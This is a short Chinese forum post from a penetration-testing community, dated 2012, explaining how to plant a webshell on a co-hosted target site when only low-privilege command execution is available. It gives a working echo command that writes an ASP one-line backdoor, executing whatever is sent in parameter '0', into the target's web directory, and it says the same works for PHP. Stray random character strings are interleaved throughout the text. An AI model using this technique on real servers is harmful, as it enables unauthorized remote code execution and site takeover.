中国网络渗透测试联盟
标题:
旁注cmd低权限下拿webshell
[打印本页]
作者:
admin
时间:
2012-9-23 14:40
标题:
旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
/ K7 w- {% t5 X# I
4 _6 M$ i$ l* s/ D+ m; ^
命令格式
0 N$ O% {0 u3 T7 A
1 q2 {& ^1 C, z7 j5 @% O
Echo 语句 >目标站绝对目录
4 k0 F5 E+ U, p- o. n9 v) K. K
8 k. r/ d& ^+ ?* W' o! }1 g$ m
例如:
C$ x9 n$ v! m6 f
$ ^2 U/ v/ E& ~0 V- N
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
3 W7 G, ?) h( u) o1 f, k
" J& g1 z: _9 |# J
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
# f+ W4 s S* Q9 Z+ L, `( S
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2